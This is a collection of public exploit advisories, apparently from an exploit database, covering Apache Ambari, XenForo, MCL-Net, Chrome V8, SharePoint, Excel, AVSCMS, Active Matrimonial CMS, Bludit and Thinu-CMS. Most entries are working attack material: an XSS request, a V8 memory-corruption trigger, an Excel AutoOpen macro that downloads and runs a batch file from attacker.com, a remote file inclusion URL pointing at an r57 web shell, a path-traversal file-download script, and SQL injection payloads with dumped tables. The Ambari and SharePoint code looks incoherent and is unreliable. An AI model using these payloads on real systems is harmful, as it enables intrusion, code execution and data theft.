<pre><code># Exploit Title: Azure Apache Ambari 2302250400 - Spoofing<br /># Date: 2023-06-23<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : Remote<br /># Vendor Homepage:<br />Microsoft<br />Apache Ambari<br />Microsoft azure Hdinsights<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-23408<br /><br />import requests<br /><br /># Set the URL and headers for the Ambari web interface<br />url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"<br />headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}<br /><br /># Define a function to validate the headers<br />def validate_headers(headers):<br /> if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":<br /> return False<br /> if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":<br /> return False<br /> return True<br /><br /># Define a function to send a request to the Ambari web interface<br />def send_request(url, headers):<br /> if not validate_headers(headers):<br /> print("Invalid headers")<br /> return<br /> response = requests.get(url, headers=headers)<br /> if response.status_code == 200:<br /> print("Request successful")<br /> else:<br /> print("Request failed")<br /><br /># Call the send_request function with the URL and headers<br />send_request(url, headers)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS<br /># Date: 2023-06-24<br /># Exploit Author: Furkan Karaarslan<br /># Category : Webapps<br /># Vendor Homepage: https://x.com/admin.php?smilies<br /># Version: 2.2.12 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : <br /><br />-----------------------------------------------------------------------------<br />Requests<br /><br />POST /admin.php?smilie-categories/0/save HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: http://127.0.0.1/admin.php?smilies/<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422<br />Content-Length: 1038<br />Origin: http://127.0.0.1<br />Connection: close<br />Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfToken"<br /><br />1687616851,83fd2350307156281e51b17e20fe575b<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="title"<br /><br /><img src=x onerror=alert(document.domain)><br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="display_order"<br /><br />1<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfRequestUri"<br /><br />/admin.php?smilies/<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfWithData"<br /><br />1<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfToken"<br /><br />1687616849,b74724a115448b864ba2db8f89f415f5<br />-----------------------------333176689514537912041638543422<br />Content-Disposition: form-data; name="_xfResponseType"<br /><br />json<br />-----------------------------333176689514537912041638543422--<br /><br /><br />Response: After it is created, an alert comes immediately.<br /><br /></code></pre>
<pre><code># Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure<br /># Date: 5/31/2023<br /># Exploit Author: Victor A. Morales, GM Sectec Inc.<br /># Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php<br /># Version: 4.3.5.8788 (other versions may be affected)<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE: CVE-2023-34834<br /><br />Description:<br />Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.<br /><br />Steps to reproduce:<br />1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. <br />2. Browse to the "/file" directory and database entry folders configured<br />3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.<br /><br /></code></pre>
<pre><code>Chrome: Internal JavaScript object access via Origin Trials<br /><br />VULNERABILITY DETAILS<br />1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.<br />2. The function is reachable from `IDLMemberInstaller::InstallAttributes`:<br />```<br />IDLMemberInstaller::InstallAttributes -><br />InstallAttribute -><br />Object::SetAccessorProperty -><br />JSObject::DefineAccessor<br />```<br />3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code.<br />4. Some origin trials install attributes directly on the global object.<br /><br />To exploit the issue:<br /><br />1. Add a non-configurable property to the global object.<br />2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.<br />3. Enable an origin trial that redefines the property as configurable.<br />4. Delete the property.<br /><br />After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.<br /><br />[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164<br /><br /><br />VERSION<br />Google Chrome 112.0.5615.49 (Official Build) (arm64)<br />Chromium 114.0.5713.0 (Developer Build) (64-bit) <br /><br /><br />REPRODUCTION CASE<br />```<br /><body><br /><script><br />var container = [{}];<br />function trigger() { container[0] = documentPictureInPicture; }<br /><br />Reflect.defineProperty(<br /> globalThis,<br /> 'documentPictureInPicture',<br /> { configurable: false, writable: true, value: {} });<br />documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.<br />for (let i = 0; i < 50000; i++) trigger();<br /><br />// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property<br />// on the global object.<br />meta = document.createElement('meta');<br />meta.httpEquiv = 'Origin-Trial';<br />meta.content =<br /> 'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +<br /> 'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +<br /> 'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';<br />document.head.appendChild(meta);<br /><br />delete documentPictureInPicture;<br />trigger();<br />container[0].prop; // Trying to access a property of the hole object should cause to a crash.<br /></script><br /></body><br />```<br /><br /><br />CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.<br /><br /><br />Related CVE Numbers: CVE-2023-2724.<br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing<br />// Date: 2023-06-20<br />// country: Iran<br />// Exploit Author: Amirhossein Bahramizadeh<br />// Category : Remote<br />// Vendor Homepage:<br />// Microsoft SharePoint Foundation 2013 Service Pack 1<br />// Microsoft SharePoint Server Subscription Edition<br />// Microsoft SharePoint Enterprise Server 2013 Service Pack 1<br />// Microsoft SharePoint Server 2019<br />// Microsoft SharePoint Enterprise Server 2016<br />// Tested on: Windows/Linux<br />// CVE : CVE-2023-28288<br /><br />#include <windows.h><br />#include <stdio.h><br /><br /><br />// The vulnerable SharePoint server URL<br />const char *server_url = "http://example.com/";<br /><br />// The URL of the fake SharePoint server<br />const char *fake_url = "http://attacker.com/";<br /><br />// The vulnerable SharePoint server file name<br />const char *file_name = "vuln_file.aspx";<br /><br />// The fake SharePoint server file name<br />const char *fake_file_name = "fake_file.aspx";<br /><br />int main()<br />{<br /> HANDLE file;<br /> DWORD bytes_written;<br /> char file_contents[1024];<br /><br /> // Create the fake file contents<br /> sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");<br /><br /> // Write the fake file to disk<br /> file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br /> if (file == INVALID_HANDLE_VALUE)<br /> {<br /> printf("Error creating fake file: %d\n", GetLastError());<br /> return 1;<br /> }<br /> if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))<br /> {<br /> printf("Error writing fake file: %d\n", GetLastError());<br /> CloseHandle(file);<br /> return 1;<br /> }<br /> CloseHandle(file);<br /><br /> // Send a request to the vulnerable SharePoint server to download the file<br /> sprintf(file_contents, "%s%s", server_url, file_name);<br /> file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br /> if (file == INVALID_HANDLE_VALUE)<br /> {<br /> printf("Error creating vulnerable file: %d\n", GetLastError());<br /> return 1;<br /> }<br /> if (!InternetReadFileUrl(file_contents, file))<br /> {<br /> printf("Error downloading vulnerable file: %d\n", GetLastError());<br /> CloseHandle(file);<br /> return 1;<br /> }<br /> CloseHandle(file);<br /><br /> // Replace the vulnerable file with the fake file<br /> if (!DeleteFile(file_name))<br /> {<br /> printf("Error deleting vulnerable file: %d\n", GetLastError());<br /> return 1;<br /> }<br /> if (!MoveFile(fake_file_name, file_name))<br /> {<br /> printf("Error replacing vulnerable file: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Send a request to the vulnerable SharePoint server to trigger the vulnerability<br /> sprintf(file_contents, "%s%s", server_url, file_name);<br /> if (!InternetReadFileUrl(file_contents, NULL))<br /> {<br /> printf("Error triggering vulnerability: %d\n", GetLastError());<br /> return 1;<br /> }<br /><br /> // Print a message indicating that the vulnerability has been exploited<br /> printf("Vulnerability exploited successfully.\n");<br /><br /> return 0;<br />}<br /><br />BOOL InternetReadFileUrl(const char *url, HANDLE file)<br />{<br /> HINTERNET internet, connection, request;<br /> DWORD bytes_read;<br /> char buffer[1024];<br /><br /> // Open an Internet connection<br /> internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);<br /> if (internet == NULL)<br /> {<br /> return FALSE;<br /> }<br /><br /> // Connect to the server<br /> connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);<br /> if (connection == NULL)<br /> {<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /><br /> // Send the HTTP request<br /> request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);<br /> if (request == NULL)<br /> {<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /> if (!HttpSendRequest(request, NULL, 0, NULL, 0))<br /> {<br /> InternetCloseHandle(request);<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /><br /> // Read the response data<br /> while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)<br /> {<br /> if (file != NULL)<br /> {<br /> // Write the data to disk<br /> if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))<br /> {<br /> InternetCloseHandle(request);<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return FALSE;<br /> }<br /> }<br /> }<br /><br /> InternetCloseHandle(request);<br /> InternetCloseHandle(connection);<br /> InternetCloseHandle(internet);<br /> return TRUE;<br />}<br /> <br /><br /></code></pre>
<pre><code>## Title: Microsoft Excel Microsoft® Microsoft 365 MSO (Version 2305<br />Build 16.0.16501.20074) 32-bit Remote Code Execution Vulnerability<br />## Author: nu11secur1ty<br />## Date: 06.27.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en-us/microsoft-365/excel<br />## Reference: https://portswigger.net/daily-swig/rce<br />## CVE-2023-33137<br /><br /><br />## Description:<br />This exploit is connected with third part exploit server, which waits<br />for the victim to call him and execute the content from him using the<br />pipe posting method! This is absolutely a 0-day exploit! This is<br />absolutely dangerous for the victims, who are infected by him!<br />When the victim hit the button in the Excel file, it makes a POST<br />request to the exploit server, and the server is responding back that<br />way: He creates another hidden malicious file and executed it directly<br />on the machine of the victim, then everything is disappeared, so<br />nasty.<br /><br />STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!<br /><br />[+]Exploit:<br />```vbs<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat<br />> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)<br />End Sub<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)<br /><br />## Time spend:<br />01:27:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Adult Video Script 8.2 RFI /LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Download : https://update.avscms.com/files/avscms-8.2-full.zip |<br />| # Dork : Powered by AVSCMS |<br />====================================================================================================================================<br /><br />P0C :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] R/L File Inclusion :<br /><br /> Line : 20 = include_once ('./lang/'.$lang_include);<br /> Function : include_once<br /> Variables :$lang_include<br /> C:\web\www\upload\siteadmin\editor_files\image.php<br /><br />[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active Matrimonial CMS v 1.5 HTML inject Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://activeitzone.com/demo/matrimonial_v1.5/ | <br />| # Dork : "Active Matrimonial CMS - All Rights Reserved " |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new member .<br /><br />[+] go to edit your profil https://127.0.0.1/activeitzonecom/demo/matrimonial_v1.5/home/profile<br /><br />[+] in Introduction box , put your code or use this code for test :<br /><br /><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /></tr><br /><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a><br /></tr><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | <br />=======================================================================================================================================<br /></code></pre>
<pre><code># -*- coding: utf-8 -*-<br />#/usr/bin/env python<br /><br /># Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)<br /># Date: 2022-07-21<br /># Exploit Author: Antonio Cuomo (arkantolo)<br /># Vendor Homepage: https://www.bludit.com<br /># Software Link: https://github.com/bludit/bludit<br /># Version: < 3.13.1<br /># Tested on: Debian 10 - PHP Version: 7.3.14<br /><br />import requests<br />import argparse<br />from bs4 import BeautifulSoup #pip3 install beautifulsoup4<br /><br />def main():<br /> parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')<br /> parser.add_argument('-x', '--url', type=str, required=True)<br /> parser.add_argument('-u', '--user', type=str, required=True)<br /> parser.add_argument('-p', '--password', type=str, required=True)<br /> parser.add_argument('-f', '--file', type=str, required=True)<br /> args = parser.parse_args()<br /> print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")<br /> exploit(args)<br /><br />def exploit(args):<br /> s2 = requests.Session()<br /><br /> url = args.url.rstrip("/")<br /><br /> #get csrf token<br /> r = s2.get(url+'/admin/')<br /> soup = BeautifulSoup(r.text, 'html.parser')<br /> formtoken = soup.find('input', {'name':'tokenCSRF'})['value']<br /><br /> #login<br /> body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}<br /> r = s2.post(url+'/admin/', data=body, allow_redirects=False)<br /> if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):<br /> print("[*] Login OK")<br /> else:<br /> print("[*] Login Failed")<br /> exit(1)<br /><br /> #arbitrary download<br /> r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)<br /> if(r.status_code==200 and len(r.content)>0):<br /> print("[*] File:")<br /> print(r.text)<br /> else:<br /> print("[*] Exploit Failed")<br /> exit(1)<br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.codester.com/items/40401/ │<br />│ Vendor : Thinu Tech │<br />│ Software : Thinu-CMS Blog System 1.5 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /category.php<br /><br />http://website/category.php?cat_id=[SQLI]<br /><br /><br />GET parameter 'cat_id' is vulnerable to SQL Injection<br /><br />---<br />Parameter: cat_id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: cat_id=3 AND 7897=7897<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: cat_id=3 OR (SELECT 8233 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(8233=8233,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: cat_id=3 AND (SELECT 1981 FROM (SELECT(SLEEP(5)))lKbu)<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'epiz_***50***_cms'<br /><br /><br />fetching tables<br /><br />[10 tables]<br />+----------------+<br />| ad_providers |<br />| advertisements |<br />| categories |<br />| contacts |<br />| navigation |<br />| posts |<br />| reports |<br />| settings |<br />| users |<br />| users_online |<br />+----------------+<br /><br /><br />fetching columns from Table 'users'<br /><br />[16 columns]<br />+----------------+--------------+<br />| Column | Type |<br />+----------------+--------------+<br />| about | text |<br />| cover_image | text |<br />| token | text |<br />| user_email | varchar(255) |<br />| user_facebook | text |<br />| user_firstname | varchar(255) |<br />| user_id | int(255) |<br />| user_image | text |<br />| user_instagram | text |<br />| user_job | varchar(255) |<br />| user_lastname | varchar(255) |<br />| user_password | varchar(255) |<br />| user_role | varchar(255) |<br />| user_twitter | text |<br />| user_website | text |<br />| username | varchar(255) |<br />+----------------+--------------+<br /><br /><br />[-] Done<br /></code></pre>